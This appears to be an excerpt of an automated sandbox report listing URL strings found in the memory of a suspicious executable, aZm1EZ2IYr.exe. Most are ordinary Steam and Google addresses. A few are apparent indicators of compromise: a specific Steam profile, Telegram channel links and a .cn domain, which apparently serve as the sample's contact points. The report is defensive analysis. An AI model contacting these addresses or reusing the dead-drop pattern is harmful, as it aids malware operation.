                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=bOP7RorZq4_W&l=englis
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=UuGFpt56D9L4&l=
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=engli
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=KkhJqW2NGKiM&l=engli
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&
                          Source: aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=jq1jQyX1843y&amp
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&l=engl
                          Source: 76561199786602107[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=nBdvNPPzc0qI&
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1
                          Source: aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
                          Source: aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://help.steampowered.com/en/
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                          Source: 76561199786602107[1].htm.0.drString found in binary or memory: https://steamcommunity.com/
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://steamcommunity.com/discussions/
                          Source: 76561199786602107[1].htm.0.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199786602107
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://steamcommunity.com/market/
                          Source: aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                          Source: aZm1EZ2IYr.exeString found in binary or memory: https://steamcommunity.com/profiles/76561199786602107
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1948655948.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://steamcommunity.com/profiles/76561199786602107/badges
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1948655948.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://steamcommunity.com/profiles/76561199786602107/inventory/
                          Source: aZm1EZ2IYr.exeString found in binary or memory: https://steamcommunity.com/profiles/76561199786602107g0b4cMozilla/5.0
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199786602107vR.
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://steamcommunity.com/workshop/
                          Source: 76561199786602107[1].htm.0.drString found in binary or memory: https://store.steampowered.com/
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                          Source: 76561199786602107[1].htm.0.drString found in binary or memory: https://store.steampowered.com/about/
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://store.steampowered.com/explore/
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://store.steampowered.com/mobile
                          Source: aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://store.steampowered.com/news/
                          Source: aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://store.steampowered.com/points/shop/
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://store.steampowered.com/stats/
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925949975.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, 76561199786602107[1].htm.0.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000002.2043565161.0000000003ADF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
                          Source: aZm1EZ2IYr.exeString found in binary or memory: https://t.me/lpnjoke
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1963012121.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1962940086.0000000003AE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/lpnjoke4/i
                          Source: aZm1EZ2IYr.exeString found in binary or memory: https://t.me/lpnjokeg0b4cMozilla/5.0
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                          Source: aZm1EZ2IYr.exe, 00000000.00000003.1926014370.0000000003AE9000.00000004.00000020.00020000.00000000.sdmp, aZm1EZ2IYr.exe, 00000000.00000003.1925541489.0000000003AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
